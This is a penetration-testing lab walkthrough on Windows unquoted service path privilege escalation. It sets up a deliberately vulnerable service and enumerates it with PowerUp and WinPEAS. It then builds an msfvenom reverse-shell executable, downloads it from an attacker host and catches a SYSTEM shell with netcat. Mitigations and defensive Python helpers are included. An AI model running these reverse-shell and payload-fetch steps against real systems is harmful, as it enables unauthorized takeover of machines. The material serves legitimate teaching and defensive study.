Unquoted Service Path

Uploaded by

Doğukan Boyraz

UNQUOTED SERVICE PATH

Contents
Introduction
    Unquoted Service Path
Vulnerability Insight
Prerequisite
Lab Setup
    Steps to Setup Vulnerable Environment
Abusing Unquoted Service Paths
Mitigation

Microsoft Windows offers a wide range of fine-grained permissions and privileges for controlling access
to Windows components, including services, files, and registry entries. Exploiting an unquoted service
path is one technique for increasing privileges.
An unquoted path, or unquoted service path, is reported as a critical vulnerability in Windows: it allows
an attacker holding a low-privileged user account to escalate privileges to NT AUTHORITY\SYSTEM.

Introduction
Unquoted Service Path
An installed service is said to have an unquoted service path when the path to its binary contains
spaces and is not enclosed in quotation marks. As a result, a local user who can write to a higher-level
directory within that path can place an executable there and obtain a shell with administrator
privileges.
Mitre ID: T1574.009
Tactics: Privilege Escalation & Persistence
Platforms: Windows

Vulnerability Insight
If a service path contains spaces and is not enclosed in quotation marks, the Windows API has to guess
where the referenced executable is located. If, for example, a service uses the unquoted path:
Vulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
the system will try the following locations in order, from 1 to 4. A malicious executable placed under
one of the earlier names in a writable directory is therefore launched instead of file.exe.
1. C:\Program.exe
2. C:\Program Files\Ignite.exe
3. C:\Program Files\Ignite Data\Vuln.exe
4. C:\Program Files\Ignite Data\Vuln Service\file.exe
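As an added example (not part of the original document), the following Python reproduces the two checks this section and the later Get-UnquotedService step rely on: the order in which Windows resolves an unquoted path (the sequence 1 to 4 above) and the test "the path contains a space and is not quoted". The service names and path values are constructed samples. The resolution rule (every space-delimited prefix is tried in turn, with .exe appended when the last component has no extension) follows the behaviour described above, and the code also handles a correctly quoted path with arguments, which the text does not show.

```python
from typing import Dict, List

# Constructed sample of Win32_Service PathName values (not captured from a
# real host). "vulns" mirrors the lab service; the other two show a path
# without spaces and a correctly quoted path whose arguments contain spaces.
SAMPLE_SERVICES: Dict[str, str] = {
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "vulns": r"C:\Program Files\Ignite Data\Vuln Service\file.exe",
    "SafeSvc": r'"C:\Program Files\Safe Vendor\svc.exe" -config "a b.ini"',
}


def is_unquoted_with_space(path_name: str) -> bool:
    """The Get-UnquotedService test: the path contains a space and does not
    start with a double quote. Spaces inside quoted arguments do not count."""
    s = path_name.strip()
    return " " in s and not s.startswith('"')


def _with_exe(prefix: str) -> str:
    """Windows appends .exe when the last path component has no extension."""
    last = prefix.rsplit("\\", 1)[-1]
    return prefix if "." in last else prefix + ".exe"


def search_order(path_name: str) -> List[str]:
    """Return the executables Windows would try, in order, for this PathName.

    For an unquoted path every space-delimited prefix is a candidate, ending
    with the full string. A quoted path has no ambiguity, so only the quoted
    executable is returned.
    """
    s = path_name.strip()
    if s.startswith('"'):
        return [s[1:s.index('"', 1)]]
    parts = s.split(" ")
    return [_with_exe(" ".join(parts[:i])) for i in range(1, len(parts) + 1)]


def find_unquoted(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each affected service name to the candidate locations Windows
    would check first; a defender must keep every one of them non-writable
    for low-privileged users, or quote the path."""
    return {name: search_order(p) for name, p in services.items()
            if is_unquoted_with_space(p)}


if __name__ == "__main__":
    for name, candidates in find_unquoted(SAMPLE_SERVICES).items():
        print(f"[!] {name}: unquoted path containing spaces")
        for i, candidate in enumerate(candidates, 1):
            print(f"    {i}. {candidate}")
```

Running the block prints only the "vulns" service with the four candidates listed in the text; on a real host the SAMPLE_SERVICES dictionary would be replaced by the Name and PathName columns of the Win32_Service query.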

Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Tools: SubInACL, PowerUp.ps1, WinPEAS.
Condition: Compromise the target machine with low-privileged access, for example using Metasploit or
Netcat.
Objective: Escalate from a low-privileged user to NT AUTHORITY\SYSTEM privileges by exploiting the
unquoted path vulnerability.

Lab Setup
To set up a vulnerable environment for an unquoted path, we need user accounts. Here we have user
“ignite”, who is a member of the Administrators group, and “Shreya”, who is a member of the Users group.

net user ignite


net user shreya

Steps to Setup Vulnerable Environment
Step 1: Create a new folder and a subfolder, named “Ignite Data” and “Vuln Service” respectively.

mkdir "C:\Program Files\Ignite Data\Vuln Service"

Step 2: Create a vulnerable service whose binary path points to file.exe.

sc create "vulns" binpath= "C:\Program Files\Ignite Data\Vuln Service\file.exe" start= auto

Step 3: Grant write permission to BUILTIN\Users on the Ignite Data folder with the help of icacls.

icacls "C:\Program Files\Ignite Data" /grant "BUILTIN\Users":W

*icacls is a native Microsoft Windows command-line program that can display and modify
permissions on directories and files.

Step 4: To create a vulnerable service, we also need to assign some toxic privileges, using SubInACL
to change the permissions of the service.
NOTE:
SubInACL is a little-known command-line tool from Microsoft, yet it is one of the best tools for working
with security permissions in Windows. It is capable of changing the permissions of files, folders, registry
keys, services, printers, cluster shares, and various other types of objects.
In this case, out of the full list of available service permissions, we grant a user the permissions to
suspend (pause/continue), start, and stop (restart) the service.
Step 5: After downloading SubInACL, execute the following command to assign PTO permissions to user
“ignite” against the “Pentest” service.

subinacl.exe /service vulns /grant=msedgewin10\shreya=PTO

Abusing Unquoted Service Paths


Abusing an unquoted service path is a technique that exploits insecure file permissions in order to
escalate privileges for local users. Download the PowerUp.ps1 script on Kali Linux; it returns the name
and binary path of every service whose path is unquoted and contains a space.

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
python -m SimpleHTTPServer 80

Gain initial access to the target machine, transfer PowerUp.ps1, and run the Get-UnquotedService
command. It uses Get-WmiObject to query all win32_service objects, extracts the binary path name of
each, and then checks whether any binary path contains a space and is not quoted.

nc -lvp 1245
powershell
wget http://192.168.1.3/PowerUp.ps1 -o PowerUp.ps1
powershell -ep bypass
Import-Module .\PowerUp.ps1
Get-UnquotedService

As a result, we have enumerated the path for file.exe, as highlighted in the image below.

From the output above, we identify three directories in the path: “Program Files”, “Ignite Data”, and
“Vuln Service”. For each directory, we use icacls to check its permissions.

icacls "C:\Program Files"


icacls "C:\Program Files\Ignite Data"
icacls "C:\Program Files\Ignite Data\Vuln Service"

Here we find that BUILTIN\Users holds write permission on “Ignite Data”.
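Reading icacls output by hand is fine for three directories, but the check performed above (which principals hold write-capable rights on each directory of the service path) is worth automating when auditing many services. The following Python is an added example, not from the original document: it parses icacls-style output for each directory and reports the low-privileged principals that can create files there. The output text is constructed to mirror the lab (a default Program Files ACL, and the W grant on Ignite Data); the rights abbreviations (F, M, W, WD, AD, GW, IO, and so on) are the ones icacls itself uses.

```python
import re
from typing import Dict, List

# Principals every local low-privileged user belongs to.
LOW_PRIV = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users"}
# icacls simple rights and specific rights that allow creating files.
SIMPLE_WRITE = {"F", "M", "W"}
SPECIFIC_WRITE = {"WD", "AD", "WDAC", "WO", "DC", "GW", "GA"}

# Constructed icacls output, shaped like the real tool prints it (path on the
# first line, one ACE per line, trailing summary). Not captured from a host.
SAMPLE_ICACLS: Dict[str, str] = {
    r"C:\Program Files": r"""C:\Program Files NT SERVICE\TrustedInstaller:(F)
                 NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                 NT AUTHORITY\SYSTEM:(M)
                 BUILTIN\Administrators:(M)
                 BUILTIN\Users:(RX)
                 BUILTIN\Users:(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files""",
    r"C:\Program Files\Ignite Data": r"""C:\Program Files\Ignite Data BUILTIN\Users:(W)
                             NT SERVICE\TrustedInstaller:(I)(F)
                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                             BUILTIN\Administrators:(I)(OI)(CI)(F)
                             BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files""",
    r"C:\Program Files\Ignite Data\Vuln Service": r"""C:\Program Files\Ignite Data\Vuln Service NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                          BUILTIN\Administrators:(I)(OI)(CI)(F)
                                          BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files""",
}


def grants_write(rights: str) -> bool:
    """True if an ACE rights string such as "(I)(OI)(CI)(F)" or "(WD,AD)" lets
    the principal create files in this directory itself. An (IO) ACE applies
    only to children, so it does not make this directory writable."""
    groups = re.findall(r"\(([^)]*)\)", rights)
    if "IO" in groups:
        return False
    return any(r in SIMPLE_WRITE or r in SPECIFIC_WRITE
               for g in groups for r in g.split(","))


def parse_icacls(path: str, output: str) -> Dict[str, List[str]]:
    """Turn icacls output for one directory into principal -> [rights, ...]."""
    acl: Dict[str, List[str]] = {}
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):          # the first line carries the path
            line = line[len(path):].strip()
        principal, rights = line.rsplit(":", 1)
        acl.setdefault(principal.strip(), []).append(rights.strip())
    return acl


def low_priv_writers(path: str, output: str) -> List[str]:
    """Low-privileged principals with write-capable rights on the directory."""
    acl = parse_icacls(path, output)
    return sorted(p for p, rs in acl.items()
                  if p in LOW_PRIV and any(grants_write(r) for r in rs))


def audit(outputs: Dict[str, str]) -> Dict[str, List[str]]:
    """Audit every directory along an unquoted service path."""
    return {path: low_priv_writers(path, out) for path, out in outputs.items()}


if __name__ == "__main__":
    for path, writers in audit(SAMPLE_ICACLS).items():
        flag = "WRITABLE by " + ", ".join(writers) if writers else "ok"
        print(f"{path}: {flag}")
```

Only “Ignite Data” is reported as writable by BUILTIN\Users, matching the manual check above; feeding the function the real icacls output of each directory gives the same verdict for any service path found by the previous step.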

Using the automated script WinPEASx64, we enumerate the suspicious file and folder for the unquoted path.

winPEASx64.exe quiet servicesinfo

As a result, it shows the same finding as above.

It’s time to exploit the weakly configured service through its unquoted path in order to escalate
privileges for user Shreya. As we know, the unquoted folder name is Vuln Service, so we create a file
named Vuln.exe with the help of msfvenom.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > Vuln.exe


python -m SimpleHTTPServer 80

Start a fresh Netcat listener in a new terminal and transfer Vuln.exe into the target machine’s
“Ignite Data” folder. Since Shreya is a member of BUILTIN\Users, which has write permission on “Ignite
Data”, restarting the service will result in a reverse connection.

cd "C:\Program Files\Ignite Data"


powershell wget http://192.168.1.3/Vuln.exe -o Vuln.exe
net start vulns

As soon as the service launches, the attacker gets a reverse connection in the new netcat session as
NT AUTHORITY\SYSTEM.

nc -lvp 8888
whoami

Even if the user only has the option to restart the system, this approach still works: the service is set to
start automatically, so on reboot it launches Vuln.exe, which again provides a reverse connection.

shutdown /r /t 0

As soon as the service launches, the attacker gets a reverse connection in the new netcat session as
NT AUTHORITY\SYSTEM.

nc -lvp 8888

Mitigation
Vulnerability Solution: Ensure that any service whose binary path contains a space has that path enclosed
in quotes.
Restrict File and Directory Permissions: Restrict access by setting directory and file permissions that are
not specific to users or privileged accounts.
Execution Prevention: Block execution of code on a system through application control and/or script
blocking.
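As an added example (not from the original document), the following Python builds the corrected binPath value for the first mitigation: it wraps the executable portion of an unquoted path in quotes, keeps any arguments outside the quotes, and produces the sc config command that applies the change (sc.exe expects a space after binpath= and the inner quotes escaped as \"). It assumes the executable is the first token ending in .exe, so confirm that against the actual file on disk before applying it; the service name and path are the lab values from the text.

```python
import re


def quote_service_path(path_name: str) -> str:
    """Return a binPath value with the executable portion enclosed in quotes.

    Already-quoted paths and paths without spaces are returned unchanged.
    The executable is assumed to end at the first '.exe' token (case-
    insensitive); whatever follows is treated as arguments and stays outside
    the quotes, which is how a correctly registered service looks.
    """
    s = path_name.strip()
    if s.startswith('"') or " " not in s:
        return s
    m = re.search(r"\.exe(?=\s|$)", s, re.IGNORECASE)
    if not m:
        raise ValueError(f"cannot locate the executable in: {s}")
    exe, args = s[:m.end()], s[m.end():]
    return f'"{exe}"{args}'


def sc_config_command(service: str, path_name: str) -> str:
    """Build the sc.exe command that rewrites the service's binPath.

    sc.exe requires a space after 'binpath=' and, because the whole value is
    itself quoted, the inner quotes must be escaped as \\".
    """
    escaped = quote_service_path(path_name).replace('"', '\\"')
    return f'sc config "{service}" binpath= "{escaped}"'


if __name__ == "__main__":
    # Lab service from the text; after this change the path in step 2 of the
    # Vulnerability Insight section is no longer ambiguous.
    print(sc_config_command(
        "vulns", r"C:\Program Files\Ignite Data\Vuln Service\file.exe"))
```

After running the printed command as an administrator, `sc qc vulns` should show the BINARY_PATH_NAME wrapped in quotes, and Get-UnquotedService or WinPEAS no longer lists the service. Quoting the path alone does not remove the write permission that Users hold on “Ignite Data”, so the second mitigation (revoking that grant with icacls) still applies.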

www.ignitetechnologies.in